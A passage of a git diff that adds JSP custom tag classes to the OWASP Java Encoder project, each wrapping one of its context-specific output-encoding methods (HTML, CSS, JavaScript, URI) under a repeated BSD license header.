0000000..ef9b482 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java @@ -0,0 +1,57 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import javax.servlet.jsp.tagext.SimpleTagSupport; + +/** + * The base class for the encoding tags within this package. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public abstract class EncodingTag extends SimpleTagSupport { + /** + * The value to be written out by the tag. + */ + protected String _value; + /** + * Sets the value to be written out by the tag. + * @param value the value to be written out by the tag. + */ + public void setValue(String value) { + this._value = value; + } + +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java new file mode 100644 index 0000000..23db285 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform encoding sufficient to place into a CDATA block. + * This wraps the {@link org.owasp.encoder.Encode#forCDATA(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCDATATag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forCDATA(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java new file mode 100644 index 0000000..e6edb5e --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform CSS encoding for CSS strings. + * This wraps the {@link org.owasp.encoder.Encode#forCssString(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCssStringTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forCssString(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java new file mode 100644 index 0000000..673a975 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform CSS encoding for CSS URL contexts. + * This wraps the {@link org.owasp.encoder.Encode#forCssUrl(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCssUrlTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forCssUrl(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java new file mode 100644 index 0000000..866b933 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform HTML encoding for HTML text attributes. + * This wraps the {@link org.owasp.encoder.Encode#forHtmlAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlAttributeTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forHtmlAttribute(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java new file mode 100644 index 0000000..9ebf3c7 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform HTML encoding for text content. + * This wraps the {@link org.owasp.encoder.Encode#forHtmlContent(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlContentTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forHtmlContent(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java new file mode 100644 index 0000000..71c7d73 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform HTML encoding. + * This wraps the {@link org.owasp.encoder.Encode#forHtml(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forHtml(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java new file mode 100644 index 0000000..5b895f9 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform HTML Attribute encoding for an unquoted attribute. + * This wraps the {@link org.owasp.encoder.Encode#forHtmlUnquotedAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlUnquotedAttributeTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forHtmlUnquotedAttribute(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java new file mode 100644 index 0000000..71ff6b6 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform JavaScript Attribute encoding. + * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptAttributeTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forJavaScriptAttribute(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java new file mode 100644 index 0000000..439f963 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform JavaScript Block encoding. + * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptBlock(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptBlockTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forJavaScriptBlock(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java new file mode 100644 index 0000000..4b6b3b1 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform JavaScript Source encoding. + * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptSource(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptSourceTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forJavaScriptSource(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java new file mode 100644 index 0000000..c3edc17 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform JavaScript encoding. + * This wraps the {@link org.owasp.encoder.Encode#forJavaScript(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forJavaScript(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java new file mode 100644 index 0000000..ab1552e --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java @@ -0,0 +1,53 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS 